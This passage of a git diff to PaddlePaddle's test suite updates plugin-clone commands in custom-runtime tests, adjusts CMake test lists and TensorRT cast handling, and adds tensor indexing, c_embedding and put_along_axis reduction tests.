220c9a0a21aeb1..aeebec9e342c32 100644 --- a/test/custom_runtime/test_custom_cpu_profiler_plugin.py +++ b/test/custom_runtime/test_custom_cpu_profiler_plugin.py @@ -24,7 +24,7 @@ def setUp(self): cur_dir = os.path.dirname(os.path.abspath(__file__)) self.temp_dir = tempfile.TemporaryDirectory() 
cmd = 'cd {} \ - && git clone --depth 1 {} \ + && git clone --depth 1 {} -b {} \ && cd PaddleCustomDevice \ && git fetch origin \ && git checkout {} -b dev \ @@ -33,6 +33,7 @@ def setUp(self): self.temp_dir.name, os.getenv('PLUGIN_URL'), os.getenv('PLUGIN_TAG'), + os.getenv('PLUGIN_TAG'), sys.executable, ) os.system(cmd) diff --git a/test/custom_runtime/test_custom_cpu_to_static.py b/test/custom_runtime/test_custom_cpu_to_static.py index 60ba27004afbdd..55181cc017440f 100644 --- a/test/custom_runtime/test_custom_cpu_to_static.py +++ b/test/custom_runtime/test_custom_cpu_to_static.py @@ -106,7 +106,7 @@ def setUp(self): cur_dir = os.path.dirname(os.path.abspath(__file__)) self.temp_dir = tempfile.TemporaryDirectory() cmd = 'cd {} \ - && git clone --depth 1 {} \ + && git clone --depth 1 {} -b {} \ && cd PaddleCustomDevice \ && git fetch origin \ && git checkout {} -b dev \ @@ -115,6 +115,7 @@ def setUp(self): self.temp_dir.name, os.getenv('PLUGIN_URL'), os.getenv('PLUGIN_TAG'), + os.getenv('PLUGIN_TAG'), sys.executable, ) os.system(cmd) diff --git a/test/custom_runtime/test_custom_op_setup.py b/test/custom_runtime/test_custom_op_setup.py index 47c7d9821d6b8e..2086b3ac6f2ed1 100644 --- a/test/custom_runtime/test_custom_op_setup.py +++ b/test/custom_runtime/test_custom_op_setup.py @@ -104,7 +104,7 @@ def setUp(self): self.cur_dir = os.path.dirname(os.path.abspath(__file__)) self.temp_dir = tempfile.TemporaryDirectory() cmd = 'cd {} \ - && git clone --depth 1 {} \ + && git clone --depth 1 {} -b {} \ && cd PaddleCustomDevice \ && git fetch origin \ && git checkout {} -b dev \ @@ -114,6 +114,7 @@ def setUp(self): self.temp_dir.name, os.getenv('PLUGIN_URL'), os.getenv('PLUGIN_TAG'), + os.getenv('PLUGIN_TAG'), sys.executable, self.cur_dir, ) diff --git a/test/custom_runtime/test_fleet_launch_custom_device.sh b/test/custom_runtime/test_fleet_launch_custom_device.sh index cc851558462399..5cbb3a11d14220 100644 --- a/test/custom_runtime/test_fleet_launch_custom_device.sh +++ b/test/custom_runtime/test_fleet_launch_custom_device.sh @@ -18,7 +18,7 @@ set -e temp_dir=$(mktemp --directory) pushd ${temp_dir} \ -&& git clone --depth 1 ${PLUGIN_URL} \ +&& git clone --depth 1 ${PLUGIN_URL} -b ${PLUGIN_TAG} \ && pushd PaddleCustomDevice/ \ && git fetch origin \ && git checkout ${PLUGIN_TAG} -b dev \ diff --git a/test/dygraph_to_static/CMakeLists.txt b/test/dygraph_to_static/CMakeLists.txt index e2ce58b7cf58c2..bdb9f182e46ada 100644 --- a/test/dygraph_to_static/CMakeLists.txt +++ b/test/dygraph_to_static/CMakeLists.txt @@ -8,6 +8,9 @@ set(SOT_ENVS SOT_LOG_LEVEL=0 COST_MODEL=False MIN_GRAPH_SIZE=0 set(GC_ENVS FLAGS_eager_delete_tensor_gb=0.0) list(REMOVE_ITEM TEST_OPS test_lac) +list(REMOVE_ITEM TEST_OPS test_grad) # disable test_grad on release/2.6 +list(REMOVE_ITEM TEST_OPS test_sentiment +)# disable test_sentiment on release/2.6 # NOTE(Aurelius84): In case of Windows CI, if open ON_INFER, RWLOCK of Scope # will be removed and will cause some random failed in multi-thread. 
if(WITH_PYTHON) @@ -28,6 +31,9 @@ if(NOT WITH_GPU) # disable some model test on CPU to avoid timeout list(REMOVE_ITEM TEST_OPS test_resnet) list(REMOVE_ITEM TEST_OPS test_build_strategy) + list(REMOVE_ITEM TEST_OPS test_bert) + list(REMOVE_ITEM TEST_OPS test_transformer) + list(REMOVE_ITEM TEST_OPS test_mobile_net) endif() foreach(TEST_OP ${TEST_OPS}) @@ -37,15 +43,11 @@ endforeach() set_tests_properties(test_se_resnet PROPERTIES TIMEOUT 900) set_tests_properties(test_yolov3 PROPERTIES TIMEOUT 900 LABELS "RUN_TYPE=EXCLUSIVE") -set_tests_properties(test_mobile_net PROPERTIES TIMEOUT 120) set_tests_properties(test_seq2seq PROPERTIES TIMEOUT 420) set_tests_properties(test_cycle_gan PROPERTIES TIMEOUT 150) -set_tests_properties(test_bert PROPERTIES TIMEOUT 180) set_tests_properties(test_basic_api_transformation PROPERTIES TIMEOUT 240) set_tests_properties(test_reinforcement_learning PROPERTIES TIMEOUT 120) -set_tests_properties(test_transformer PROPERTIES TIMEOUT 200) set_tests_properties(test_bmn PROPERTIES TIMEOUT 300) -set_tests_properties(test_bert PROPERTIES TIMEOUT 240) if(NOT WIN32) set_tests_properties(test_tsm PROPERTIES TIMEOUT 900) @@ -53,12 +55,14 @@ endif() if(APPLE) set_tests_properties(test_bmn PROPERTIES TIMEOUT 300) - set_tests_properties(test_mobile_net PROPERTIES TIMEOUT 300) endif() if(WITH_GPU) set_tests_properties(test_train_step_resnet18_sgd PROPERTIES TIMEOUT 240) set_tests_properties(test_train_step_resnet18_adam PROPERTIES TIMEOUT 240) + set_tests_properties(test_bert PROPERTIES TIMEOUT 240) + set_tests_properties(test_transformer PROPERTIES TIMEOUT 240) + set_tests_properties(test_mobile_net PROPERTIES TIMEOUT 240) endif() # Legacy IR only tests for dygraph_to_static diff --git a/test/dygraph_to_static/test_list.py b/test/dygraph_to_static/test_list.py index 52db0e53eb6255..ef3d195d90805d 100644 --- a/test/dygraph_to_static/test_list.py +++ b/test/dygraph_to_static/test_list.py @@ -292,6 +292,7 @@ def init_dygraph_func(self): test_list_pop_in_while_loop, ] + # TODO(zhangbo): Refine BuildOpFrom for op with sub_block def train(self, to_static=False): with base.dygraph.guard(): if to_static: diff --git a/test/dygraph_to_static/test_mobile_net.py b/test/dygraph_to_static/test_mobile_net.py index 599d863d12c795..44cf791191a8de 100644 --- a/test/dygraph_to_static/test_mobile_net.py +++ b/test/dygraph_to_static/test_mobile_net.py @@ -19,7 +19,10 @@ import unittest import numpy as np -from dygraph_to_static_utils import Dy2StTestBase, test_pt_only +from dygraph_to_static_utils import ( + Dy2StTestBase, + test_pt_only, +) from predictor_utils import PredictorTools import paddle @@ -735,12 +738,6 @@ def assert_same_predict(self, model_name): ) @test_pt_only - def test_mobile_net_pir(self): - # MobileNet-V1 - self.assert_same_loss("MobileNetV1") - # MobileNet-V2 - self.assert_same_loss("MobileNetV2") - def test_mobile_net(self): # MobileNet-V1 self.assert_same_loss("MobileNetV1") diff --git a/test/indexing/test_getitem.py b/test/indexing/test_getitem.py index f3a2374ecbe1d0..3959bde43d1528 100644 --- a/test/indexing/test_getitem.py +++ b/test/indexing/test_getitem.py @@ -233,6 +233,26 @@ def test_combined_index_11(self): np.testing.assert_allclose(y.numpy(), np_res) + def test_combined_index_12(self): + np_data = ( + np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6)).astype(self.ndtype) + ) + + if self.dtype == 'bfloat16': + np_data = convert_uint16_to_float(convert_float_to_uint16(np_data)) + if self.dtype == 'complex64' or self.dtype == 'complex128': + np_data = np_data + 1j * 
np_data + + np_res = np_data[:, :, [2, 4], :] + + x = paddle.to_tensor(np_data, dtype=self.dtype) + y = x[:, :, [2, 4], :] + + if self.dtype == 'bfloat16': + y = paddle.cast(y, dtype='float32') + + np.testing.assert_allclose(y.numpy(), np_res) + def test_index_has_range(self): np_data = ( np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6)).astype(self.ndtype) @@ -970,6 +990,20 @@ def test_combined_index_11(self): np.testing.assert_allclose(res[0], np_res) + def test_combined_index_12(self): + np_data = np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6)) + np_res = np_data[:, :, [2, 4], :] + with paddle.static.program_guard( + paddle.static.Program(), paddle.static.Program() + ): + x = paddle.to_tensor(np_data) + y = _getitem_static( + x, (slice(None), slice(None), [2, 4], slice(None)) + ) + res = self.exe.run(fetch_list=[y]) + + np.testing.assert_allclose(res[0], np_res) + def test_index_has_range(self): # only one bool tensor with all False np_data = np.arange(3 * 4 * 5 * 6).reshape((3, 4, 5, 6)) diff --git a/test/indexing/test_setitem.py b/test/indexing/test_setitem.py index b8d7e3361efc45..0f0bdf3d08b8da 100644 --- a/test/indexing/test_setitem.py +++ b/test/indexing/test_setitem.py @@ -28,6 +28,21 @@ def setUp(self): self.ndtype = np.float64 self.dtype = 'float64' + def test_advanced_index(self): + np_data = np.zeros((3, 4, 5, 6), dtype='float32').astype(self.ndtype) + if self.dtype == 'bfloat16': + np_data = convert_uint16_to_float(convert_float_to_uint16(np_data)) + if self.dtype == 'complex64' or self.dtype == 'complex128': + np_data = np_data + 1j * np_data + + x = paddle.to_tensor(np_data, dtype=self.dtype) + np_data[[0, 1], [1, 2], [1]] = 10.0 + x[[0, 1], [1, 2], [1]] = 10.0 + + if self.dtype == 'bfloat16': + x = paddle.cast(x, dtype='float32') + np.testing.assert_allclose(x.numpy(), np_data) + def test_combined_index_1(self): np_data = np.zeros((3, 4, 5, 6), dtype='float32').astype(self.ndtype) if self.dtype == 'bfloat16': @@ -228,6 +243,54 @@ def test_indexing_is_boolean_false(self): np.testing.assert_allclose(x.numpy(), np_data) + def test_combined_indexing_and_value_is_tensor_2(self): + # value is tensor needed to broadcast and index will be adjusted + np_data = np.ones((3, 4, 5, 6)).astype(self.ndtype) + value_data = np.arange(3 * 4 * 2 * 1).reshape((3, 4, 2, 1)) + + if self.dtype == 'bfloat16': + np_data = convert_uint16_to_float(convert_float_to_uint16(np_data)) + value_data = convert_uint16_to_float( + convert_float_to_uint16(value_data) + ) + if self.dtype == 'complex64' or self.dtype == 'complex128': + np_data = np_data + 1j * np_data + value_data = value_data + 1j * value_data + + x = paddle.to_tensor(np_data, dtype=self.dtype) + v = paddle.to_tensor(value_data, dtype=self.dtype) + x[..., [1, 4], ::2] = v + + np_data[..., [1, 4], ::2] = value_data + if self.dtype == 'bfloat16': + x = paddle.cast(x, dtype='float32') + np.testing.assert_allclose(x.numpy(), np_data) + + def test_combined_indexing_and_value_is_tensor_3(self): + # value is tensor and index will be adjusted + # and the value rank is less than original tensor + np_data = np.ones((3, 4, 5, 6)).astype(self.ndtype) + value_data = np.arange(2 * 3 * 5).reshape((2, 3, 5)) + + if self.dtype == 'bfloat16': + np_data = convert_uint16_to_float(convert_float_to_uint16(np_data)) + value_data = convert_uint16_to_float( + convert_float_to_uint16(value_data) + ) + if self.dtype == 'complex64' or self.dtype == 'complex128': + np_data = np_data + 1j * np_data + value_data = value_data + 1j * value_data + + x = paddle.to_tensor(np_data, 
dtype=self.dtype) + v = paddle.to_tensor(value_data, dtype=self.dtype) + x[:, [1, 3], :, [3, 4]] = v + + np_data[:, [1, 3], :, [3, 4]] = value_data + + if self.dtype == 'bfloat16': + x = paddle.cast(x, dtype='float32') + np.testing.assert_allclose(x.numpy(), np_data) + def test_inplace_with_stride(self): np_v = np.random.randn(3, 1).astype(self.ndtype) if self.dtype == 'bfloat16': @@ -242,12 +305,12 @@ def test_inplace_with_stride(self): zero.stop_gradient = False zero1 = zero * 1 - zero1[paddle.to_tensor([0, 1])] = vv + zero1[1, paddle.to_tensor([2, 0, 1])] = vv loss = zero1.sum() loss.backward() - expected_v_grad = np.ones((3, 1)) * 10.0 + expected_v_grad = np.ones((3, 1)) * 5.0 if self.dtype == 'bfloat16': np.testing.assert_allclose( v.grad.cast('float32').numpy(), expected_v_grad @@ -574,6 +637,69 @@ def test_indexing_is_boolean_false(self): np.testing.assert_allclose(res[0], np_data) + def test_combined_indexing_and_value_is_tensor_1(self): + # value is tensor with same shape to getitem and index will be adjusted + np_data = np.ones((3, 3), dtype='int32') + value_data = np.array([-1, -1, -1]) + np_data[:, [0, 2]] = np_data[:, [0, 2]] * np.expand_dims(value_data, -1) + with paddle.static.program_guard( + paddle.static.Program(), paddle.static.Program() + ): + x = paddle.ones((3, 3), dtype='int32') + v = paddle.to_tensor([-1, -1, -1]) + y = _setitem_static( + x, + (slice(None), [0, 2]), + x[:, [0, 2]] * v.unsqueeze(-1), + ) + res = self.exe.run(fetch_list=[y]) + + np.testing.assert_allclose(res[0], np_data) + + def test_combined_indexing_and_value_is_tensor_2(self): + # value is tensor needed to broadcast and index will be adjusted + np_data = np.ones((3, 4, 5, 6), dtype='int32') + value_data = np.arange(3 * 4 * 2 * 1).reshape((3, 4, 2, 1)) + np_data[..., [1, 4], ::2] = value_data + + with paddle.static.program_guard( + paddle.static.Program(), paddle.static.Program() + ): + x = paddle.ones((3, 4, 5, 6), dtype='int32') + v = paddle.arange(3 * 4 * 2 * 1).reshape((3, 4, 2, 1)) + + y = _setitem_static( + x, + (..., [1, 4], slice(None, None, 2)), + v, + ) + + res = self.exe.run(fetch_list=[y]) + + np.testing.assert_allclose(res[0], np_data) + + def test_combined_indexing_and_value_is_tensor_3(self): + # value is tensor and index will be adjusted + # and the value rank is less than original tensor + np_data = np.ones((3, 4, 5, 6), dtype='int32') + value_data = np.arange(2 * 3 * 5).reshape((2, 3, 5)) + np_data[:, [1, 3], :, [3, 4]] = value_data + + with paddle.static.program_guard( + paddle.static.Program(), paddle.static.Program() + ): + x = paddle.ones((3, 4, 5, 6), dtype='int32') + v = paddle.arange(2 * 3 * 5).reshape((2, 3, 5)) + y = _setitem_static( + x, + (slice(None), [1, 3], slice(None), [3, 4]), + v, + ) + + res = self.exe.run(fetch_list=[y]) + + np.testing.assert_allclose(res[0], np_data) + if __name__ == '__main__': unittest.main() diff --git a/test/ir/inference/program_config.py b/test/ir/inference/program_config.py index a2f36617de8e6e..f9424502484ccb 100644 --- a/test/ir/inference/program_config.py +++ b/test/ir/inference/program_config.py @@ -275,6 +275,7 @@ def generate_weight(): self.outputs = outputs self.input_type = input_type self.no_cast_list = [] if no_cast_list is None else no_cast_list + self.supported_cast_type = [np.float32, np.float16] def __repr__(self): log_str = '' @@ -292,11 +293,9 @@ def __repr__(self): return log_str def set_input_type(self, _type: np.dtype) -> None: - assert _type in [ - np.float32, - np.float16, - None, - ], "PaddleTRT only supports FP32 / 
FP16 IO" + assert ( + _type in self.supported_cast_type or _type is None + ), "PaddleTRT only supports FP32 / FP16 IO" ver = paddle.inference.get_trt_compile_version() trt_version = ver[0] * 1000 + ver[1] * 100 + ver[2] * 10 @@ -309,15 +308,14 @@ def set_input_type(self, _type: np.dtype) -> None: def get_feed_data(self) -> Dict[str, Dict[str, Any]]: feed_data = {} for name, tensor_config in self.inputs.items(): - do_casting = ( - self.input_type is not None and name not in self.no_cast_list - ) + data = tensor_config.data # Cast to target input_type - data = ( - tensor_config.data.astype(self.input_type) - if do_casting - else tensor_config.data - ) + if ( + self.input_type is not None + and name not in self.no_cast_list + and data.dtype in self.supported_cast_type + ): + data = data.astype(self.input_type) # Truncate FP32 tensors to FP16 precision for FP16 test stability if data.dtype == np.float32 and name not in self.no_cast_list: data = data.astype(np.float16).astype(np.float32) @@ -334,10 +332,14 @@ def _cast(self) -> None: for name, inp in self.inputs.items(): if name in self.no_cast_list: continue + if inp.dtype not in self.supported_cast_type: + continue inp.convert_type_inplace(self.input_type) for name, weight in self.weights.items(): if name in self.no_cast_list: continue + if weight.dtype not in self.supported_cast_type: + continue weight.convert_type_inplace(self.input_type) return self diff --git a/test/ir/inference/test_trt_convert_assign.py b/test/ir/inference/test_trt_convert_assign.py index 55939982d5ee0d..99b027877bc9cb 100644 --- a/test/ir/inference/test_trt_convert_assign.py +++ b/test/ir/inference/test_trt_convert_assign.py @@ -120,9 +120,8 @@ def clear_dynamic_shape(): self.dynamic_shape.opt_input_shape = {} def generate_trt_nodes_num(attrs, dynamic_shape): - if not dynamic_shape and ( - self.has_bool_dtype or self.dims == 1 or self.dims == 0 - ): + # Static shape does not support 0 or 1 dim's input + if not dynamic_shape and (self.dims == 1 or self.dims == 0): return 0, 4 return 1, 2 diff --git a/test/ir/inference/test_trt_convert_cast.py b/test/ir/inference/test_trt_convert_cast.py index 026abc571050a2..0b5f2186429e3e 100644 --- a/test/ir/inference/test_trt_convert_cast.py +++ b/test/ir/inference/test_trt_convert_cast.py @@ -118,6 +118,7 @@ def generate_input(type): ) }, outputs=["cast_output_data1"], + no_cast_list=["input_data"], ) yield program_config diff --git a/test/ir/inference/test_trt_convert_lookup_table.py b/test/ir/inference/test_trt_convert_lookup_table.py index e1fb64bcdf545f..b7cf7d657d7a02 100644 --- a/test/ir/inference/test_trt_convert_lookup_table.py +++ b/test/ir/inference/test_trt_convert_lookup_table.py @@ -80,6 +80,7 @@ def generate_input2(dims, attrs: List[Dict[str, Any]]): ) }, outputs=["out_data"], + no_cast_list=["indices"], ) yield program_config diff --git a/test/ir/inference/test_trt_convert_solve.py b/test/ir/inference/test_trt_convert_solve.py index c3f9b51d0d05c2..de70cfacc4e071 100644 --- a/test/ir/inference/test_trt_convert_solve.py +++ b/test/ir/inference/test_trt_convert_solve.py @@ -87,11 +87,10 @@ def clear_dynamic_shape(): # for dynamic_shape generate_dynamic_shape(attrs) self.trt_param.precision = paddle_infer.PrecisionType.Float32 - program_config.set_input_type(np.float32) yield self.create_inference_config(), (1, 3), 1e-5 + self.trt_param.precision = paddle_infer.PrecisionType.Half - program_config.set_input_type(np.float16) - yield self.create_inference_config(), (1, 3), 1e-3 + yield self.create_inference_config(), (1, 
3), (1e-3, 1e-3) def test(self): self.run_test() diff --git a/test/legacy_test/CMakeLists.txt b/test/legacy_test/CMakeLists.txt index 9c875f6755187a..0d54fa7ea37400 100644 --- a/test/legacy_test/CMakeLists.txt +++ b/test/legacy_test/CMakeLists.txt @@ -550,9 +550,9 @@ if((NOT WITH_GPU) endif() list(REMOVE_ITEM TEST_OPS "test_stride") +list(REMOVE_ITEM TEST_OPS "test_graph_reindex") if(WITH_COVERAGE) list(REMOVE_ITEM TEST_OPS test_weight_decay) - list(REMOVE_ITEM TEST_OPS test_graph_reindex) list(REMOVE_ITEM TEST_OPS test_cuda_graphed_layer) list(REMOVE_ITEM TEST_OPS test_cuda_graph_partial_graph_static_run) list(REMOVE_ITEM DIST_TEST_OPS test_dist_fleet_geo) diff --git a/test/legacy_test/c_embedding_op_base.py b/test/legacy_test/c_embedding_op_base.py index 83758b6bb0bc98..cfb9df8e69d22d 100644 --- a/test/legacy_test/c_embedding_op_base.py +++ b/test/legacy_test/c_embedding_op_base.py @@ -34,10 +34,8 @@ def get_c_embedding(start, end, table, ids): return output -def c_embedding_wrapper(table, index, start_index=0): - return paddle._legacy_C_ops.c_embedding( - table, index, "start_index", start_index - ) +def c_embedding_wrapper(table, index, start_index=0, vocab_size=-1): + return paddle._C_ops.c_embedding(table, index, start_index, vocab_size) class TestCEmbeddingCPU(OpTest): @@ -58,11 +56,15 @@ def initcase(self): ) self.start_index = 10 self.end_index = self.start_index + 17 + self.vocab_size = 34 self.inputs = {'W': table, 'Ids': ids} np_out = get_c_embedding(self.start_index, self.end_index, table, ids) self.outputs = {'Out': np_out.reshape((2, 4, 64))} - self.attrs = {'start_index': self.start_index} + self.attrs = { + 'start_index': self.start_index, + 'vocab_size': self.vocab_size, + } if core.is_compiled_with_xpu(): self.__class__.use_xpu = True @@ -87,12 +89,20 @@ def test_check_output(self): self.check_output_with_place(core.CUDAPlace(0)) elif core.is_compiled_with_xpu(): self.check_output_with_place(core.XPUPlace(0)) + else: + current_place = paddle.framework._current_expected_place() + if isinstance(current_place, paddle.CustomPlace): + self.check_output_with_place(current_place) def test_check_grad(self): if core.is_compiled_with_cuda(): self.check_grad_with_place(core.CUDAPlace(0), ['W'], 'Out') elif core.is_compiled_with_xpu(): self.check_grad_with_place(core.XPUPlace(0), ['W'], 'Out') + else: + current_place = paddle.framework._current_expected_place() + if isinstance(current_place, paddle.CustomPlace): + self.check_grad_with_place(current_place, ['W'], 'Out') def init_dtype(self): if core.is_compiled_with_cuda(): @@ -101,6 +111,11 @@ def init_dtype(self): elif core.is_compiled_with_xpu(): self.dtype = "float32" self.ids_dtype = "int64" + else: + current_place = paddle.framework._current_expected_place() + if isinstance(current_place, paddle.CustomPlace): + self.dtype = "float32" + self.ids_dtype = "int64" class TestCEmbeddingOpFP32(TestCEmbeddingOpBase): diff --git a/test/legacy_test/test_download.py b/test/legacy_test/test_download.py index 742c4b2a651902..da25a3021a31e0 100644 --- a/test/legacy_test/test_download.py +++ b/test/legacy_test/test_download.py @@ -120,14 +120,6 @@ def test_retry_exception( './test', ) - def test_wget_download_error( - self, - ): - with self.assertRaises(RuntimeError): - from paddle.utils.download import _download - - _download('www.baidu', './test', method='wget') - def test_download_methods( self, ): @@ -136,14 +128,9 @@ def test_download_methods( "https://paddle-hapi.bj.bcebos.com/unittest/files.zip", ] - import sys - from 
paddle.utils.download import _download - if sys.platform == 'linux': - methods = ['wget', 'get'] - else: - methods = ['get'] + methods = ['get'] for url in urls: for method in methods: diff --git a/test/legacy_test/test_put_along_axis_op.py b/test/legacy_test/test_put_along_axis_op.py index 43d2e80c25e24a..47cfc65d617136 100644 --- a/test/legacy_test/test_put_along_axis_op.py +++ b/test/legacy_test/test_put_along_axis_op.py @@ -120,6 +120,470 @@ def init_data(self): self.axis_type = "int64" +class TestPutAlongAxisOpMul(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "mul" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] *= self.value[ + i, j, k + ] + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': True, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpMulNotIncludeSelf(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "mul" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + self.nums = np.zeros_like(self.target) + for i in range(5): + for j in range(5): + for k in range(5): + if self.nums[i, self.index[i, j, k], k] == 0: + self.target[i, self.index[i, j, k], k] = self.value[ + i, j, k + ] + else: + self.target[i, self.index[i, j, k], k] *= self.value[ + i, j, k + ] + self.nums[i, self.index[i, j, k], k] += 1 + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': False, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpAdd(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "add" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. 
+ self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] += self.value[ + i, j, k + ] + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': True, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = np.random.randint(1, 100, (5, 5, 5)).astype( + self.value_type + ) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpAddNotIncludeSelf(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "add" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + self.nums = np.zeros_like(self.target) + for i in range(5): + for j in range(5): + for k in range(5): + if self.nums[i, self.index[i, j, k], k] == 0: + self.target[i, self.index[i, j, k], k] = self.value[ + i, j, k + ] + else: + self.target[i, self.index[i, j, k], k] += self.value[ + i, j, k + ] + self.nums[i, self.index[i, j, k], k] += 1 + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': False, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpMean(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "mean" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. 
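# The reference output for reduce="mean" with Include_self=True is built below by
# accumulating every scattered value into `target` while tracking the number of
# contributions per element in `nums` (initialized to ones so the original value
# counts once), then dividing element-wise -- a plain-NumPy restatement of the
# semantics the put_along_axis kernel is expected to implement.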
+ self.target = copy.deepcopy(self.xnp) + self.nums = np.ones_like(self.target) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] += self.value[ + i, j, k + ] + self.nums[i, self.index[i, j, k], k] += 1 + for i in range(10): + for j in range(10): + for k in range(10): + self.target[i, j, k] /= self.nums[i, j, k] + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': True, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpMeanNotIncludeSelf(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "mean" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. + self.target = copy.deepcopy(self.xnp) + self.nums = np.zeros_like(self.target) + for i in range(5): + for j in range(5): + for k in range(5): + if self.nums[i, self.index[i, j, k], k] == 0: + self.target[i, self.index[i, j, k], k] = self.value[ + i, j, k + ] + else: + self.target[i, self.index[i, j, k], k] += self.value[ + i, j, k + ] + self.nums[i, self.index[i, j, k], k] += 1 + for i in range(10): + for j in range(10): + for k in range(10): + if self.nums[i, j, k] > 0: + self.target[i, j, k] = ( + self.target[i, j, k] / self.nums[i, j, k] + ) + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'Include_self': False, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpMin(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "amin" + self.op_type = "put_along_axis" + self.python_api = paddle.tensor.put_along_axis + self.xnp = np.random.random(self.x_shape).astype(self.x_type) + # numpy put_along_axis is an inplace operation. 
+ self.target = copy.deepcopy(self.xnp) + for i in range(5): + for j in range(5): + for k in range(5): + self.target[i, self.index[i, j, k], k] = ( + self.value[i, j, k] + if self.value[i, j, k] + < self.target[i, self.index[i, j, k], k] + else self.target[i, self.index[i, j, k], k] + ) + self.inputs = { + 'Input': self.xnp, + 'Index': self.index, + 'Value': self.value, + } + self.attrs = { + 'Axis': self.axis, + 'Reduce': self.reduce_op, + 'include_self': True, + 'broadcast': False, + } + self.outputs = {'Result': self.target} + + def init_data(self): + self.dtype = 'float64' + self.x_type = "float64" + self.x_shape = (10, 10, 10) + self.value_type = "float64" + self.value = ( + np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type) + ) + self.index_type = "int64" + self.index = np.zeros((5, 5, 5)).astype(self.index_type) + self.axis = 1 + self.axis_type = "int64" + + +class TestPutAlongAxisOpMinNotIncludeSelf(TestPutAlongAxisOp): + def setUp(self): + self.init_data() + self.reduce_op = "amin" + self.op_type = "put_along_axis" + self.python_api = 